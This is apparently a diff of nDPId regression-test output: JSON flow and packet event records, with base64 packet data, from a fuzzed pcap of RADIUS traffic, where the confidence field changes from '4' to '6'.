-00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997829855,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997829855,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997833437,"flow_last_seen":1528997833437,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997833437,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.48.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1528997833437,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997833437,"pkt":"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"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997833437,"flow_last_seen":1528997833437,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997833437,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.48.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997833437,"flow_last_seen":1528997833437,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997833437,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.48.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997833703,"flow_last_seen":1528997833703,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997833703,"l3_proto":"ip4","src_ip":"198.52.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1528997833703,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1528997833703,"pkt":"ABRP+4rqcNuYVcUnCABFAADABiRAAPwRTcfGNBk1CgxAHgcUchAArG8ZA38ApPpRavVvUwLj8+Vom5Z2csUBNTAzMTE0ODAyODE1MDE1ODlAS2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE3Y1EvZXM6NWY6NDU6OTA6MDk6FWYvMjMyEiIzMjc2NCBTdWJzY3JpYmVyIG5vdCBwcm92aXNpb25lZE8HBAEABwBQEnLsj3tLTX0TFwMzSpwXcJE="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997833703,"flow_last_seen":1528997833703,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997833703,"l3_proto":"ip4","src_ip":"198.52.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
-00704{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":128,"flow_first_seen":1528996068129,"flow_last_seen":1528997833636,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":55818,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1528997833703,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997833703,"flow_last_seen":1528997833703,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997833703,"l3_proto":"ip4","src_ip":"198.52.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00704{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":128,"flow_first_seen":1528996068129,"flow_last_seen":1528997833636,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":55818,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1528997833703,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1528997839248,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997839248,"pkt":"AAAMB6xAABRP+4rqCABFAALbITKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997839322,"flow_last_seen":1528997839322,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1528997839322,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997839322,"pkt":"ABRP+4rqcNuYVcUnCABFAAClBj5AAPwRTcjG4hk1CgxAHgcVchAAkSN5C4AAiYCfkZP9IDJyM93m2y+NtRUBNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0MDAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE3Y2YvYjA6OWY6YmE6NGE6MGU6N2UvMjMzTw4BAAAMFwwAAAwBf\/xQEl7YRWPdxCp7KxkigG7kdUs="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997839322,"flow_last_seen":1528997839322,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997839322,"flow_last_seen":1528997839322,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":237,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997839449} 01219{"packet_event_id":1,"packet_event_name":"packet","packet_id":237,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528997839322,"pkt":"AAAMB6xAVRRP+4qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00197{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":238,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997839511} 00562{"packet_event_id":1,"packet_event_name":"packet","packet_id":238,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528997839322,"pkt":"ABRP+4rqcNuYVcUnCABlAADABkJAAPwRTaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997654780,"flow_last_seen":1528997660003,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2365,"flow_avg_l4_payload_len":591,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":239,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997654780,"flow_last_seen":1528997660003,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2365,"flow_avg_l4_payload_len":591,"midstream":0,"thread_ts_msec":1528997839322,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997867612,"flow_last_seen":1528997867612,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997867612,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29204,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1528997867612,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997867612,"pkt":"ABRP+4rqcNuYVcUnCABFAAClBqNAAPsRTmPG4hk1CgxAHgcUchQAkRggC4IAiUKdIcJOOZHCxHzP96o9900BNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZy4gNWIyMvo3Y2YvYjA6OWY64mE6NGE6MGU6N2UvMmgzTw4BAAAMFwwAAAwBf\/xQEmqru8HGcXlY8CXWo9RL+sk="} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997867612,"flow_last_seen":1528997867612,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997867612,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29204,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997654780,"flow_last_seen":1528997660003,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2365,"flow_avg_l4_payload_len":591,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997659473,"flow_last_seen":1528997659473,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29295,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997663786,"flow_last_seen":1528997663786,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29304,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997867612,"flow_last_seen":1528997867612,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997867612,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29204,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997654780,"flow_last_seen":1528997660003,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2365,"flow_avg_l4_payload_len":591,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997659473,"flow_last_seen":1528997659473,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29295,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 